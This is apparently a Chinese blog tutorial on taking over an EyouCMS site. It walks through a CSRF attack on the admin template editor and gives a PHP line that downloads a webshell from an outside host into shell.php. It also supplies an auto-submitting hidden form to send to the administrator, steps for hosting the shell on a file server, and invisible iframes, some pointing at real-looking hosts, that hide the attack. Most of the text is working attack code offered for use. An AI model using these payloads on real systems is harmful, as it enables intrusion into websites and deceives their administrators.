第一步
来到模板管理,找到footer.html文档。
点击编辑
将其中得源码保存下来
<footer class="bg-main">
<div class="container-layout">
<ul>
{eyou:channel type="top" row="4" id="field"}
<li class="float-left item-{$i} hidden-l hidden-s">
<h3 class="text-middle margin-big-bottom">{$field.typename}</h3>
<ul>
{eyou:channel name="$field.children" row="100" id="field2"}
<li><a href="{$field2.typeurl}" title="{$field2.typename}">{$field2.typename}</a></li>
{/eyou:channel}
</ul>
</li>
{/eyou:channel}
<li class="float-left item-5">
{eyou:type typeid='54'}
<h3 class="text-middle margin-big-bottom">{$field.typename}</h3>
{/eyou:type}
<div class="contact">
<div class="media media-x margin-big-bottom">
<span class="float-left radius-circle bg-yellow text-white text-center">
<i class="fa fa-map-marker fa-fw" aria-hidden="true"></i>
</span>
<div class="media-body">
<p>{eyou:global name='web_attr_16' /}<p>
</div>
</div>
<div class="media media-x margin-big-bottom">
<span class="float-left radius-circle bg-yellow text-white text-center">
<i class="fa-fw fa fa-phone"></i>
</span>
<div class="media-body">
<p>
<a href="tel:{eyou:global name='web_attr_1' /}" class="Conv_DINCondensedC text-large">{eyou:global name='web_attr_1' /}</a>
<p>
</div>
</div>
<div class="media media-x margin-big-bottom">
<span class="float-left radius-circle bg-yellow text-white text-center">
<i class="fa fa-envelope fa-fw"></i>
</span>
<div class="media-body">
<p>
<a href="mailto:{eyou:global name='web_attr_15' /}" class="text-middle">{eyou:global name='web_attr_15' /}</a>
</p>
</div>
</div>
</div>
</li>
<li class="float-left item-6">
<div class="qr padding radius text-center"><img src="{eyou:global name='web_attr_17' /}"><p class="text-gray height-middle">关注我们</p></div>
</li>
</ul>
</div>
<div class="blank-middle"></div>
<!-- 友情链接 -->
<div class="container-layout">
<div class="line">
<div class="tab">
<div class="tab-head">
<ul class="tab-nav">
<li class="active"><a href="#friend-1">友情链接</a></li>
<!-- <li><a href="#friend-2">友情链接-图片</a> </li> -->
</ul>
</div>
<div class="tab-body">
<div class="tab-panel active flink" id="friend-1">
{eyou:flink titlelen='45' type='text'}
<a href="{$field.url}" {$field.target}>{$field.title} </a>
{/eyou:flink}
</div>
<!-- <div class="tab-panel flink" id="friend-2">
{eyou:flink titlelen='45' type='image'}
<a href="{$field.url}" {$field.target}><img src="{$field.logo}"> </a>
{/eyou:flink}
</div> -->
</div>
</div>
</div>
</div>
<!-- 友情链接 end -->
<div class="container-layout">
<div class="line">
<div class="copyright height">
<div class="x8">
{eyou:global name='web_copyright' /} {eyou:global name='web_recordnum' /}
</div>
<div class="x4 text-right">
<a href="{eyou:global name='web_basehost' /}/sitemap.xml">SiteMap</a>
</div>
</div>
</div>
</div>
</footer>
<!--底部版权-->
<!-- 应用插件标签 start -->
{eyou:weapp type='default' /}
<!-- 应用插件标签 end -->
以上代码作为保存,待到Getshell后进入后台还原。
删除原有代码写入新代码
<?php
file_put_contents("shell.php",file_get_contents("http://1.1.1.1/shell.txt"));
?>
代码主要含义:首先利用 file_get_contents 函数请求获取 http://1.1.1.1/shell.txt 内容,然后在利用 file_put_contents 函数,将file_get_contents 函数获取得内容写入到根目录下面得shell.php。
然后保存抓取数据包。
然后制作POST类型得CSRF数据包
<html>
<body>
<form action="http://对方网址/login.php?m=admin&c=Filemanager&a=edit&lang=cn" method="POST">
<input type="hidden" name="activepath" value="/template/pc" />
<input type="hidden" name="filename" value="footer.htm" />
<input type="hidden" name="content" value="<?php file_put_contents('shell.php',file_get_contents('http://1.1.1.1/shell.txt')); ?>" />
</form>
<script> document.forms[0].submit(); </script>
</body>
</html>
上面代码得含义我解释一下
<input type="hidden" name="content" value="<?php file_put_contents('shell.php',file_get_contents('http://1.1.1.1/shell.txt')); ?>" />
这里需要将其中得双引号修改为单引号,其主要原因是input表单外部有双引号,最终如果他得value值也存在双引号会导致代码发生错误。另外其中有些下划线等符号被html实体化转义也需要更正过来。
其中加入了自动点击按钮,无需人工触发。
搭建一个hsf文件下载器,用于file_get函数获取文件,将 http://1.1.1.1/shell.txt 替换为你得shell下载地址。一定要确保hfs能被外网访问到。
发送制作好得html链接地址给管理员
当对方点击后会提示修改成功。
我们去刷新首页。
最后getshell成功!
在这个过程我们还需要去隐藏状态。并且因为每次用户点击之后我们需要去前台刷新,让插入得php代码得以运行。所以还需要自动刷新。
最终结果:
<h1>今日新闻</h1>
<iframe src="http://www.wbug.org:9003/eyoucms.html" width="0" height="0"></iframe>
<iframe src="http://1.117.163.116/index.php" width="0" height="0"></iframe>
当用户触发后不会看到被修改成功得页面,并且会自动生成webshell。最终达到神不知鬼不觉得目的。
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容